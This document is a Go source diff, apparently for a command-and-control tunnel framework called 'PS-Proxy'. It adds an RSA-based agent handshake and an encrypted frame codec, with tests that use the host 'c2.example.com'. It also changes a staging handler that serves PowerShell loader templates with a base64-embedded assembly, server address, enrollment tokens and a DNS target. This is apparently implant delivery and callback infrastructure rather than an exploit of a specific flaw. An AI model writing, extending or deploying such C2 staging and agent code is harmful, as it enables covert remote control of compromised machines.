pubDER, err := x509.MarshalPKIXPublicKey(&key.PublicKey)
if err != nil {
return nil, err
}
mac := hmac.New(sha256.New, secret)
mac.Write([]byte(protocol.Magic))
mac.Write([]byte(line))
mac.Write(serverNonce)
mac.Write(clientNonce)
mac.Write(pubDER)
proof := mac.Sum(nil)
resp := "PROOF " + base64.RawURLEncoding.EncodeToString(serverNonce) + " " + base64.RawURLEncoding.EncodeToString(proof) + "\n"
if _, err := io.WriteString(conn, resp); err != nil {
return nil, err
}
return protocol.NewSecureCodec(br, conn, secret)
}
type singleListener struct { type singleListener struct {
conn net.Conn conn net.Conn
done chan struct{} done chan struct{}
@@ -716,28 +776,45 @@ type multiFlag []string
func (m *multiFlag) String() string { return strings.Join(*m, ",") } func (m *multiFlag) String() string { return strings.Join(*m, ",") }
func (m *multiFlag) Set(v string) error { *m = append(*m, v); return nil } func (m *multiFlag) Set(v string) error { *m = append(*m, v); return nil }
func normalizeCertPin(pin string) (string, error) { func loadOrCreateIdentityKey(path string) (*rsa.PrivateKey, error) {
normalized := strings.ToLower(strings.ReplaceAll(strings.ReplaceAll(strings.TrimSpace(pin), ":", ""), " ", "")) if b, err := os.ReadFile(path); err == nil {
if len(normalized) != 64 { block, _ := pem.Decode(b)
return "", fmt.Errorf("pin must be 64 hex characters after removing colons/spaces") if block == nil {
return nil, fmt.Errorf("no PEM block in %s", path)
}
if k, err := x509.ParsePKCS1PrivateKey(block.Bytes); err == nil {
return k, nil
}
parsed, err := x509.ParsePKCS8PrivateKey(block.Bytes)
if err != nil {
return nil, err
}
k, ok := parsed.(*rsa.PrivateKey)
if !ok {
return nil, errors.New("identity key is not RSA")
}
return k, nil
} else if !os.IsNotExist(err) {
return nil, err
} }
if _, err := hex.DecodeString(normalized); err != nil { k, err := rsa.GenerateKey(rand.Reader, 3072)
return "", fmt.Errorf("pin must be hex: %w", err) if err != nil {
return nil, err
} }
return normalized, nil b := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)})
if err := os.WriteFile(path, b, 0600); err != nil {
return nil, err
}
return k, nil
} }
func certPin(path string) (string, error) { func publicKeyStaging(k *rsa.PrivateKey) (string, string, error) {
pemBytes, err := os.ReadFile(path) der, err := x509.MarshalPKIXPublicKey(&k.PublicKey)
if err != nil { if err != nil {
return "", err return "", "", err
} }
block, _ := pem.Decode(pemBytes) sum := sha256.Sum256(der)
if block == nil || block.Type != "CERTIFICATE" { return base64.StdEncoding.EncodeToString(der), hex.EncodeToString(sum[:]), nil
return "", fmt.Errorf("no PEM certificate found in %s", path)
}
sum := sha256.Sum256(block.Bytes)
return hex.EncodeToString(sum[:]), nil
} }
func publicURL(domain string, port int) string { func publicURL(domain string, port int) string {
if port == 443 { if port == 443 {
+67 -16
View File
@@ -2,7 +2,14 @@ package main
import ( import (
"bufio" "bufio"
"crypto/hmac"
"crypto/rand"
"crypto/rsa"
"crypto/sha256"
"crypto/x509"
"encoding/base64"
"net" "net"
"strings"
"testing" "testing"
"time" "time"
@@ -124,23 +131,67 @@ func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
t.Fatal("second accept should return EOF") t.Fatal("second accept should return EOF")
} }
} }
func TestServerSecureHandshakeEncryptedFrame(t *testing.T) {
func TestNormalizeCertPin(t *testing.T) { key, err := rsa.GenerateKey(rand.Reader, 3072)
pin := "BC:1D:96:47:91:A5:11:B4:95:26:EC:F2:25:35:37:F6:E6:17:0A:1A:19:4F:45:65:9E:88:0C:A7:A4:3D:6C:02"
got, err := normalizeCertPin(pin)
if err != nil { if err != nil {
t.Fatalf("normalize pin failed: %v", err) t.Fatal(err)
} }
want := "bc1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02" store := staging.NewStore(time.Minute)
if got != want { sess, err := store.Create("c2.example.com", 443, "server-key", "")
t.Fatalf("unexpected normalized pin: %s", got) if err != nil {
} t.Fatal(err)
} }
server := NewTunnelServer(store, 2)
func TestNormalizeCertPinRejectsInvalidPins(t *testing.T) { server.identityKey = key
for _, pin := range []string{"abc", "zz1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02"} { srv, cli := net.Pipe()
if _, err := normalizeCertPin(pin); err == nil { defer cli.Close()
t.Fatalf("expected invalid pin %q to fail", pin) go handleAgent(srv, bufio.NewReader(srv), server)
} if _, err := cli.Write([]byte("HELLO ")); err != nil {
t.Fatal(err)
}
secret := []byte("0123456789abcdef0123456789abcdef")
nonce := []byte("abcdef0123456789abcdef0123456789")
enc, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, &key.PublicKey, secret, []byte("PS-Proxy PSP1 session"))
if err != nil {
t.Fatal(err)
}
helloTail := base64.RawURLEncoding.EncodeToString(enc) + " " + base64.RawURLEncoding.EncodeToString(nonce) + "\n"
if _, err := cli.Write([]byte(helloTail)); err != nil {
t.Fatal(err)
}
br := bufio.NewReader(cli)
line, err := br.ReadString('\n')
if err != nil {
t.Fatal(err)
}
parts := strings.Fields(strings.TrimSpace(line))
if len(parts) != 3 || parts[0] != "PROOF" {
t.Fatalf("bad proof line: %q", line)
}
serverNonce, _ := base64.RawURLEncoding.DecodeString(parts[1])
proof, _ := base64.RawURLEncoding.DecodeString(parts[2])
pubDER, _ := x509.MarshalPKIXPublicKey(&key.PublicKey)
mac := hmac.New(sha256.New, secret)
mac.Write([]byte(protocol.Magic))
mac.Write([]byte("HELLO " + helloTail))
mac.Write(serverNonce)
mac.Write(nonce)
mac.Write(pubDER)
if !hmac.Equal(proof, mac.Sum(nil)) {
t.Fatal("proof mismatch")
}
codec, err := protocol.NewSecureCodec(br, cli, secret)
if err != nil {
t.Fatal(err)
}
if err := codec.WriteFrame(protocol.Frame{Type: protocol.FramePing, Payload: []byte("ENROLL " + sess.EnrollToken + " " + sess.ReconnectToken)}); err != nil {
t.Fatal(err)
}
f, err := codec.ReadFrame()
if err != nil {
t.Fatal(err)
}
if f.Type != protocol.FramePong || string(f.Payload) != "OK" {
t.Fatalf("unexpected ack: %#v", f)
} }
} }
+159
View File
@@ -0,0 +1,159 @@
package protocol
import (
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/hmac"
"crypto/rand"
"crypto/sha256"
"encoding/binary"
"errors"
"fmt"
"io"
)
const secureMaxRecord = MaxPayload + 1024
type Codec interface {
ReadFrame() (Frame, error)
WriteFrame(Frame) error
}
type PlainCodec struct {
R io.Reader
W io.Writer
}
func NewPlainCodec(r io.Reader, w io.Writer) *PlainCodec { return &PlainCodec{R: r, W: w} }
func (c *PlainCodec) ReadFrame() (Frame, error) { return ReadFrame(c.R) }
func (c *PlainCodec) WriteFrame(f Frame) error { return WriteFrame(c.W, f) }
type SecureCodec struct {
r io.Reader
w io.Writer
encKey, macKey []byte
sendSeq, recvSeq uint64
}
func NewSecureCodec(r io.Reader, w io.Writer, secret []byte) (*SecureCodec, error) {
if len(secret) != 32 {
return nil, fmt.Errorf("secure codec requires 32-byte secret")
}
e := sha256.Sum256(append(append([]byte(nil), secret...), []byte("psproxy aes-cbc")...))
m := sha256.Sum256(append(append([]byte(nil), secret...), []byte("psproxy hmac")...))
return &SecureCodec{r: r, w: w, encKey: e[:], macKey: m[:]}, nil
}
func (c *SecureCodec) WriteFrame(f Frame) error {
var plain bytes.Buffer
var seq [8]byte
binary.BigEndian.PutUint64(seq[:], c.sendSeq)
plain.Write(seq[:])
if err := WriteFrame(&plain, f); err != nil {
return err
}
padded := pkcs7Pad(plain.Bytes(), aes.BlockSize)
block, err := aes.NewCipher(c.encKey)
if err != nil {
return err
}
iv := make([]byte, aes.BlockSize)
if _, err := rand.Read(iv); err != nil {
return err
}
ct := make([]byte, len(padded))
cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
rec := append(iv, ct...)
mac := hmac.New(sha256.New, c.macKey)
mac.Write(seq[:])
mac.Write(rec)
tag := mac.Sum(nil)
if len(rec)+len(tag) > secureMaxRecord {
return fmt.Errorf("secure record too large")
}
var lenb [4]byte
binary.BigEndian.PutUint32(lenb[:], uint32(len(rec)+len(tag)))
if _, err := c.w.Write(lenb[:]); err != nil {
return err
}
if _, err := c.w.Write(rec); err != nil {
return err
}
if _, err := c.w.Write(tag); err != nil {
return err
}
c.sendSeq++
return nil
}
func (c *SecureCodec) ReadFrame() (Frame, error) {
var lenb [4]byte
if _, err := io.ReadFull(c.r, lenb[:]); err != nil {
return Frame{}, err
}
n := binary.BigEndian.Uint32(lenb[:])
if n < aes.BlockSize+sha256.Size || n > secureMaxRecord {
return Frame{}, fmt.Errorf("invalid secure record length: %d", n)
}
rec := make([]byte, n)
if _, err := io.ReadFull(c.r, rec); err != nil {
return Frame{}, err
}
body, tag := rec[:n-sha256.Size], rec[n-sha256.Size:]
var seq [8]byte
binary.BigEndian.PutUint64(seq[:], c.recvSeq)
mac := hmac.New(sha256.New, c.macKey)
mac.Write(seq[:])
mac.Write(body)
if !hmac.Equal(tag, mac.Sum(nil)) {
return Frame{}, errors.New("secure frame authentication failed")
}
if (len(body)-aes.BlockSize)%aes.BlockSize != 0 {
return Frame{}, errors.New("invalid secure ciphertext length")
}
block, err := aes.NewCipher(c.encKey)
if err != nil {
return Frame{}, err
}
pt := make([]byte, len(body)-aes.BlockSize)
cipher.NewCBCDecrypter(block, body[:aes.BlockSize]).CryptBlocks(pt, body[aes.BlockSize:])
pt, err = pkcs7Unpad(pt, aes.BlockSize)
if err != nil {
return Frame{}, err
}
if len(pt) < 8 {
return Frame{}, errors.New("secure plaintext too short")
}
got := binary.BigEndian.Uint64(pt[:8])
if got != c.recvSeq {
return Frame{}, fmt.Errorf("secure frame sequence mismatch: got %d want %d", got, c.recvSeq)
}
f, err := ReadFrame(bytes.NewReader(pt[8:]))
if err != nil {
return Frame{}, err
}
c.recvSeq++
return f, nil
}
func pkcs7Pad(b []byte, block int) []byte {
pad := block - len(b)%block
out := append([]byte(nil), b...)
for i := 0; i < pad; i++ {
out = append(out, byte(pad))
}
return out
}
func pkcs7Unpad(b []byte, block int) ([]byte, error) {
if len(b) == 0 || len(b)%block != 0 {
return nil, errors.New("invalid padding length")
}
p := int(b[len(b)-1])
if p == 0 || p > block || p > len(b) {
return nil, errors.New("invalid padding")
}
for _, v := range b[len(b)-p:] {
if int(v) != p {
return nil, errors.New("invalid padding")
}
}
return b[:len(b)-p], nil
}
+50
View File
@@ -0,0 +1,50 @@
package protocol
import (
"net"
"testing"
)
func TestSecureCodecRoundTrip(t *testing.T) {
c1, c2 := net.Pipe()
defer c1.Close()
defer c2.Close()
secret := []byte("0123456789abcdef0123456789abcdef")
a, _ := NewSecureCodec(c1, c1, secret)
b, _ := NewSecureCodec(c2, c2, secret)
want := Frame{StreamID: 7, Type: FrameData, Payload: []byte("hello")}
go func() { _ = a.WriteFrame(want) }()
got, err := b.ReadFrame()
if err != nil {
t.Fatalf("read: %v", err)
}
if got.StreamID != want.StreamID || got.Type != want.Type || string(got.Payload) != string(want.Payload) {
t.Fatalf("got %#v want %#v", got, want)
}
}
func TestSecureCodecTamperRejection(t *testing.T) {
c1, c2 := net.Pipe()
defer c1.Close()
defer c2.Close()
secret := []byte("0123456789abcdef0123456789abcdef")
a, _ := NewSecureCodec(c1, c1, secret)
go func() { _ = a.WriteFrame(Frame{Type: FrameData, Payload: []byte("hello")}) }()
lenb := make([]byte, 4)
if _, err := c2.Read(lenb); err != nil {
t.Fatal(err)
}
rec := make([]byte, int(lenb[0])<<24|int(lenb[1])<<16|int(lenb[2])<<8|int(lenb[3]))
if _, err := c2.Read(rec); err != nil {
t.Fatal(err)
}
rec[len(rec)-1] ^= 0xff
server, client := net.Pipe()
defer server.Close()
defer client.Close()
go func() { client.Write(lenb); client.Write(rec) }()
b, _ := NewSecureCodec(server, server, secret)
if _, err := b.ReadFrame(); err == nil {
t.Fatal("tampered frame should be rejected")
}
}
+5 -5
View File
@@ -14,7 +14,7 @@ type Session struct {
ID string ID string
Server string Server string
Port int Port int
CertPin string ServerKey string
EnrollToken string EnrollToken string
ReconnectToken string ReconnectToken string
DNSTarget string DNSTarget string
@@ -43,7 +43,7 @@ func NewSecret(n int) (string, error) {
return base64.RawURLEncoding.EncodeToString(b), nil return base64.RawURLEncoding.EncodeToString(b), nil
} }
func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) { func (s *Store) Create(server string, port int, serverKey, dnsTarget string) (*Session, error) {
id, err := NewSecret(18) id, err := NewSecret(18)
if err != nil { if err != nil {
return nil, err return nil, err
@@ -56,7 +56,7 @@ func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Ses
if err != nil { if err != nil {
return nil, err return nil, err
} }
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)} sess := &Session{ID: id, Server: server, Port: port, ServerKey: serverKey, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
s.mu.Lock() s.mu.Lock()
defer s.mu.Unlock() defer s.mu.Unlock()
s.sessions[id] = sess s.sessions[id] = sess
@@ -113,7 +113,7 @@ type AgentTemplateData struct {
AssemblyB64 string AssemblyB64 string
Server string Server string
Port int Port int
CertPin string ServerKey string
EnrollToken string EnrollToken string
ReconnectToken string ReconnectToken string
DNSTarget string DNSTarget string
@@ -129,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
} }
w.Header().Set("Content-Type", "text/plain; charset=utf-8") w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Header().Set("Cache-Control", "no-store") w.Header().Set("Cache-Control", "no-store")
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget}) _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, ServerKey: sess.ServerKey, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
} }
} }
+1 -1
View File
@@ -21,7 +21,7 @@ $template = Get-Content (Join-Path $RepoRoot "agent/loader/agent.ps1.tmpl") -Raw
$template = $template.Replace('{{.AssemblyB64}}', $b64) $template = $template.Replace('{{.AssemblyB64}}', $b64)
$template = $template.Replace('{{.Server}}', '__SERVER__') $template = $template.Replace('{{.Server}}', '__SERVER__')
$template = $template.Replace('{{.Port}}', '443') $template = $template.Replace('{{.Port}}', '443')
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__') $template = $template.Replace('{{.ServerKey}}', '__SERVER_KEY__')
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__') $template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__') $template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__') $template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')